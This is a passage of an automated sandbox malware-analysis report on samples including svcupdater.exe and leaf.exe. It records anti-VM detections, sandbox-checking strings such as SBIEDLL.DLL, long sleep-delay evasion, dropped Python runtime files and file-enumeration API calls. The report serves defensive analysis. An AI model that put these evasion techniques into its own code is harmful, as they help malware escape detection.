Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: leaf.exe PID: 5340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcupdater.exe PID: 5692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcupdater.exe PID: 3184, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: leaf.exe, 00000001.00000002.2188032639.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: leaf.exe, 00000001.00000002.2188032639.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 1190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 2C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 2AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 7960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 7080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 8960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 9960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 9CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: ACB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: BCB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: CCB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: DCB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: ECB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 7A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 9CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: ACB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: BCB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: CCB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 2FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Memory allocated: 4FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 28D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 48D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 6D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 7D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 7EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 8EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 6FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 91E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: A1E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: B1E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: C1E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 1220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 2D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 27D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 6B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 7B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 7C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 6E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 8C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 9C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: AC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: BC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: FC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 29D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 2920000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 2D10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Memory allocated: 2C30000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599217	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598889	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598780	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598211	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597874	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597217	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596779	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596670	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596557	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596386	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596280	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 596061	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595732	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595514	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595184	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 595075	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Window / User API: threadDelayed 2933			Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Window / User API: threadDelayed 6918			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\python311.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66002\unicodedata.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\lib.exe

API coverage: 1.5 %

Source: C:\Users\user\AppData\Local\Temp\leaf.exe TID: 2316	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe TID: 7136	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4688	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -38738162554790034s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 2992	Thread sleep count: 2933 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 2992	Thread sleep count: 6918 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -599764s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -599327s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -599217s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -598889s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -598780s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -598211s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -597874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -597217s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -596999s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -596779s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -596670s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -596557s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -596386s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -596280s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -596061s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -595732s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -595514s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -595296s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -595184s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -595075s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 4580	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 3732	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe TID: 5004	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E149AF FindClose,FindFirstFileExW,GetLastError,	3_2_00E149AF
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E149CF FindFirstFileExW,	3_2_00E149CF
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E14A34 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	3_2_00E14A34
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E16B69 FindFirstFileExW,	3_2_00E16B69
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759966878 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	5_2_00007FF759966878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759970A34 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	5_2_00007FF759970A34
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF759966878 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	5_2_00007FF759966878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 5_2_00007FF7599569E0 FindFirstFileExW,FindClose,	5_2_00007FF7599569E0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759970A34 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF759970A34
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759966878 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	7_2_00007FF759966878
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF7599569E0 FindFirstFileExW,FindClose,	7_2_00007FF7599569E0
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Code function: 7_2_00007FF759966878 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	7_2_00007FF759966878

Source: C:\Users\user\AppData\Local\Temp\api.exe

Code function: 3_2_00DF867D VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,

3_2_00DF867D

